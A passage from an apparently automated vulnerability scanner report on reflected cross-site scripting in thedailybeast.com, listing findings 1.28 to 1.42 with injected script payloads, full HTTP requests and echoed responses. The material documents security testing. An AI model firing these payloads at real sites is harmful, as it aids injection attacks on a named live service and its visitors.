<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet7ad64"><script>alert(1)</script>179a0ffcacf/item/gop-hopefuls-jockey-for-donors/campaign-cash/"/>
...[SNIP]...

1.28. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c802"><script>alert(1)</script>fd72a61c11a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item9c802"><script>alert(1)</script>fd72a61c11a/gop-hopefuls-jockey-for-donors/campaign-cash/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item9c802"><script>alert(1)</script>fd72a61c11a/gop-hopefuls-jockey-for-donors/campaign-cash/"/>
...[SNIP]...

1.29. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73151"><script>alert(1)</script>067bf9ef41a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/gop-hopefuls-jockey-for-donors73151"><script>alert(1)</script>067bf9ef41a/campaign-cash/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors73151"><script>alert(1)</script>067bf9ef41a/campaign-cash/"/>
...[SNIP]...

1.30. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5654"><script>alert(1)</script>0f579b3ce69 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cashf5654"><script>alert(1)</script>0f579b3ce69/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cashf5654"><script>alert(1)</script>0f579b3ce69/"/>
...[SNIP]...

1.31. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42776"><script>alert(1)</script>e020b8c6915 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet42776"><script>alert(1)</script>e020b8c6915/item/house-dems-reach-leadership-agreement/congress/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet42776"><script>alert(1)</script>e020b8c6915/item/house-dems-reach-leadership-agreement/congress/"/>
...[SNIP]...

1.32. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a2d"><script>alert(1)</script>71925b788b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/iteme5a2d"><script>alert(1)</script>71925b788b8/house-dems-reach-leadership-agreement/congress/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/iteme5a2d"><script>alert(1)</script>71925b788b8/house-dems-reach-leadership-agreement/congress/"/>
...[SNIP]...

1.33. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 628cf"><script>alert(1)</script>04f0437aaae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/house-dems-reach-leadership-agreement628cf"><script>alert(1)</script>04f0437aaae/congress/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement628cf"><script>alert(1)</script>04f0437aaae/congress/"/>
...[SNIP]...

1.34. http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/house-dems-reach-leadership-agreement/congress/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bd6f"><script>alert(1)</script>8fce6f3c70d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/house-dems-reach-leadership-agreement/congress1bd6f"><script>alert(1)</script>8fce6f3c70d/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/house-dems-reach-leadership-agreement/congress1bd6f"><script>alert(1)</script>8fce6f3c70d/"/>
...[SNIP]...

1.35. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57153"><script>alert(1)</script>90b6a40fa48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet57153"><script>alert(1)</script>90b6a40fa48/item/ngos-letting-haiti-down/no-relief/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet57153"><script>alert(1)</script>90b6a40fa48/item/ngos-letting-haiti-down/no-relief/"/>
...[SNIP]...

1.36. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ed6b"><script>alert(1)</script>b40e7870f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item4ed6b"><script>alert(1)</script>b40e7870f0d/ngos-letting-haiti-down/no-relief/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item4ed6b"><script>alert(1)</script>b40e7870f0d/ngos-letting-haiti-down/no-relief/"/>
...[SNIP]...

1.37. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 843b4"><script>alert(1)</script>77ab1287e10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/ngos-letting-haiti-down843b4"><script>alert(1)</script>77ab1287e10/no-relief/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down843b4"><script>alert(1)</script>77ab1287e10/no-relief/"/>
...[SNIP]...

1.38. http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/ngos-letting-haiti-down/no-relief/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d8c6"><script>alert(1)</script>56aff80c14 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/ngos-letting-haiti-down/no-relief5d8c6"><script>alert(1)</script>56aff80c14/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/ngos-letting-haiti-down/no-relief5d8c6"><script>alert(1)</script>56aff80c14/"/>
...[SNIP]...

1.39. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/innovation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6cf"><script>alert(1)</script>d4d0120fbab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet1b6cf"><script>alert(1)</script>d4d0120fbab/newsmaker/innovation/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet1b6cf"><script>alert(1)</script>d4d0120fbab/newsmaker/innovation/"/>
...[SNIP]...

1.40. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/innovation/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3cd7"><script>alert(1)</script>ae1f3537ce6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmakerb3cd7"><script>alert(1)</script>ae1f3537ce6/innovation/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmakerb3cd7"><script>alert(1)</script>ae1f3537ce6/innovation/"/>
...[SNIP]...

1.41. http://www.thedailybeast.com/cheat-sheet/newsmaker/innovation/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/innovation/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe25"><script>alert(1)</script>20de90a0287 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/newsmaker/innovationabe25"><script>alert(1)</script>20de90a0287/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:07:22 GMT
Content-Length: 12045
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/newsmaker/innovationabe25"><script>alert(1)</script>20de90a0287/"/>
...[SNIP]...

1.42. http://www.thedailybeast.com/cheat-sheet/newsmaker/politics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/newsmaker/politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd9c"><script>alert(1)</script>52e16d6aac3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet8fd9c"><script>alert(1)</script>52e16d6aac3/newsmaker/politics/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
